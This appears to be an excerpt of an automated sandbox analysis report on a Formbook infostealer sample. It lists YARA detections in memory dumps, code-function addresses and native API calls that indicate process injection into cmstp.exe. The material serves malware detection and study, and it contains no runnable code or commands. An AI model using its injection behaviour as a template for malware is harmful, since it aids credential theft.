          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4_2_0006A2A9
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4_2_003458F0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4_2_003458E6
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4_2_0006A035
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0006A2A9
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041C0BF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041C94E
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041B9B4
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041D22F
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041C345
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041D359
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00408C6B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00408C70
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041C559
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ABE0C6
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AED005
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B3D06D
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC3040
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AD905A
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ABE2E9
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B61238
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B663BF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ABF3CF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AE63DB
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC2305
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B0A37B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC7353
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AD1489
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AF5485
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B4443E
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AFD47D
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B405E3
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ADC5F0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC351F
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B06540
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC4680
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ACE6C1
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B0A634
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B62622
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ACC7BC
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B4579A
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AF57C3
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B5F8EE
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B3F8C4
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AE286D
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ACC85C
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC29B2
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B6098E
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AD69FE
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B45955
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B4394B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B73A83
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B6CBA4
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B4DBDA
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ABFBD7
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AE7B00
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B5FDDD
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AF0D3B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ACCD5B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AF2E2F
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ADEE4C
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B5CFB1
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00B32FDC
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AD0F3F
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AEDF7C
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00146F06
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_001408FB
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00140902
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_001432FF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00143302
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00141359
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00141362
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00147D02
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_001457B2
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0006A035
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020C1238
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0201E2E9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02022305
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02027353
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0206A37B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020C63BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0201F3CF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020463DB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0204D005
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02023040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0203905A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0209D06D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0201E0C6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020C2622
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0206A634
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02024680
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0202E6C1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020A579A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0202C7BC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020557C3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020A443E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0205D47D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02055485
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02031489
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0202351F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02066540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020A05E3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0203C5F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020D3A83
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02047B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020CCBA4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020ADBDA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0201FBD7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0202C85C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0204286D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0209F8C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020BF8EE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020A394B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020A5955
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020C098E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020229B2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020369FE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02052E2F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0203EE4C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02030F3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0204DF7C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020BCFB1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02092FDC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02050D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0202CD5B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020BFDDD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000AD22F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000AC94E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_00098C6B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_00098C70
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_00092D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_00092FB0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: String function: 00ABE2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: String function: 00B2F970 appears 84 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: String function: 00B03F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: String function: 00ABDF5C appears 121 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: String function: 00B0373B appears 245 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0208F970 appears 84 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0201DF5C appears 121 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0206373B appears 245 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 02063F92 appears 132 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0201E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004185D0 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00418680 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00418700 NtClose,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004185CA NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004186FA NtClose,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004187AA NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB10D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB0060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB01D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB1148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAF8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAF938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB1930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB0C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AB1D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AAFF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00146F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00146F12 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020100C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020107AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FD8C NtDelayExecution,LdrInitializeThunk,
